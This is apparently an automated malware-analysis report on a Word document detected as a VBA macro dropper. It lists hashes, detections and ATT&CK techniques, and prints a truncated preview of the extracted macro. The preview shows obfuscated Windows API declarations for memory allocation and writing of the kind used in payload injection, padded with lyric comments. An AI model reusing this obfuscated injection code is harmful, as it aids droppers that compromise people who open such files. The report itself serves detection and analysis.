Office (OLE) malware analysis — malicious · f83812a0cd8f2328

MALICIOUS

Office (OLE)

172.5 KB Created: 2017-02-27 12:58:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 4bc3d2e7b6ac465e5c0289cec53fd8e4 SHA-1: 088a8fd23d712cac05294415b95e78075c7c1d03 SHA-256: f83812a0cd8f23289bcc1596b210186ca6cf062e34b9f7ae7a2dc21bc4ba9f5a

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros that are configured to execute automatically upon opening, as indicated by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script uses PtrSafe declarations for functions like NtAllocateVirtualMemory and ZwWriteVirtualMemory, suggesting memory manipulation and payload execution. The ClamAV detection 'Doc.Dropper.ZwMacros-6057750-0' further confirms its dropper functionality. The primary purpose appears to be downloading and executing a secondary payload.

Heuristics 4

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9376 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9376 bytes
SHA-256: `7092c0974454b5d4c8df243672ba219cc3a8e3b02c6ff93a67203a41a26f8feb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "counterpunch" ' Good Will Hunting, got up out of the hood ' I been bumping Pink Floyd, all I wanted was my recording label deal #If Win64 Then ' Awesome, I guess that's awesome ' Awesome, well let's go, awesome Public Declare PtrSafe Function ecclesiologist Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (abut As LongPtr, serine As LongPtr, ByVal casket As LongPtr,infarctByVal As LongPtr, analgesic As LongPtr, ByVal strokes As LongPtr) As LongPtr ' ' Like I feel so awesome Public Declare PtrSafe Function athene Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sophistical As LongPtr) ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function paleornithology Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal petronel As Any, ByVal augmenting As Any, ByVal absinth As Any, ByVal adrenergic As Any, ByVal roach As Any) As LongPtr ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function motley Lib "User32.dll" Alias "GrayStringA" ( ByVal aumbry As Any, ByVal behalf As Any, ByVal dracontium As Any, ByVal transduction As Any, ByVal inconclusiveness As Any, ByVal foliated As Any, ByVal attract As Any, ByVal coffee As Any, ByVal odorless As Any) As Long ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function arithmetically Lib "Shell32.dll" Alias "SHGetSettings" (appendicitis As LongPtr,dolorous As LongPtr) As LongPtr ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function auxesis Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal eidoloclast As LongPtr,animadvert As LongPtr,absentee As LongPtr,molucella As LongPtr,glossarist As LongPtr) As Boolean ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function lionhearted Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (asbestos As LongPtr, bgirl As Any,dubiety As LongPtr, boxwood As Any) As Boolean ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function desecrating Lib "Shlwapi.dll" Alias "PathFileExists" (nightwork As LongPtr) As LongPtr ' Awesome, well let's go, awesome ' Gator on my shirt, what did it Lacoste him ' That's a side smiley face cause I'mma make the best of it ' Two thumbs up, you gon point em at this guy #Else ' Awesome, I guess that's awesome ' That's why I can walk up into any restaurant and close the whole thing Public Declare Function basel Lib "Shell32.dll" Alias "SHGetSettings" (auld As Long, paleface As Long) As Long ' ' Death proof ride with Rosario Dawson Public Declare Function regretted Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal blahs As Long, pallbearer As Long, nonexploratory As Long, bacteriological As Long, wrongly As Long) As Boolean ' Wanna roll ' Public Declare Function motley Lib "User32.dll" Alias "GrayStringA" (ByVal scorched As Any, ByVal orchestrated As Any, ByVal entendu As Any, ByVal affiance As Any, ByVal curate As Any, ByVal bounty As Any, ByVal sourbread As Any, ByVal carcharhinidae As Any, ByVal cantharides As Any) As Long ' ' I assume you should make room for the elephant Public Declare Function ecclesiologist Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (gluttonous As Long, appositively As Long, ByVal pomade As Long, penchantByVal As Long, sandpapery As Long, ByVal registrant As Long) As Long ' Semi colon dash parenthesis, text messaging ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Functio ... (truncated)

SHA-256: 7092c0974454b5d4c8df243672ba219cc3a8e3b02c6ff93a67203a41a26f8feb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "counterpunch"
'  Good Will Hunting, got up out of the hood
'  I been bumping Pink Floyd, all I wanted was my recording label deal
#If Win64 Then
'  Awesome, I guess that's awesome
'  Awesome, well let's go, awesome
Public Declare PtrSafe Function ecclesiologist Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (abut As LongPtr, serine As LongPtr, ByVal casket As LongPtr,infarctByVal As LongPtr, analgesic As LongPtr, ByVal strokes As LongPtr) As LongPtr
'
'  Like I feel so awesome
Public Declare PtrSafe Function athene Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sophistical As LongPtr)
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function paleornithology Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal petronel As Any, ByVal augmenting As Any, ByVal absinth As Any, ByVal adrenergic As Any, ByVal roach As Any) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public  Declare PtrSafe Function motley Lib "User32.dll" Alias "GrayStringA" ( ByVal aumbry As Any, ByVal behalf As Any, ByVal dracontium As Any, ByVal transduction As Any, ByVal inconclusiveness As Any, ByVal foliated As Any, ByVal attract As Any, ByVal coffee As Any, ByVal odorless As Any) As Long
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function arithmetically Lib "Shell32.dll" Alias "SHGetSettings" (appendicitis As LongPtr,dolorous As LongPtr) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function auxesis Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal eidoloclast As LongPtr,animadvert As LongPtr,absentee As LongPtr,molucella As LongPtr,glossarist As LongPtr) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function lionhearted Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (asbestos As LongPtr, bgirl As Any,dubiety As LongPtr, boxwood As Any) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function desecrating Lib "Shlwapi.dll" Alias "PathFileExists" (nightwork As LongPtr) As LongPtr
'  Awesome, well let's go, awesome
'  Gator on my shirt, what did it Lacoste him

'  That's a side smiley face cause I'mma make the best of it
'  Two thumbs up, you gon point em at this guy
#Else
'  Awesome, I guess that's awesome
'  That's why I can walk up into any restaurant and close the whole thing
Public Declare Function basel Lib "Shell32.dll" Alias "SHGetSettings" (auld As Long, paleface As Long) As Long
'
'  Death proof ride with Rosario Dawson
Public Declare Function regretted Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal blahs As Long, pallbearer As Long, nonexploratory As Long, bacteriological As Long, wrongly As Long) As Boolean
'  Wanna roll
'
Public Declare Function motley Lib "User32.dll" Alias "GrayStringA" (ByVal scorched As Any, ByVal orchestrated As Any, ByVal entendu As Any, ByVal affiance As Any, ByVal curate As Any, ByVal bounty As Any, ByVal sourbread As Any, ByVal carcharhinidae As Any, ByVal cantharides As Any) As Long
'
'  I assume you should make room for the elephant
Public Declare Function ecclesiologist Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (gluttonous As Long, appositively As Long, ByVal pomade As Long, penchantByVal As Long, sandpapery As Long, ByVal registrant As Long) As Long
'  Semi colon dash parenthesis, text messaging
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Functio
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.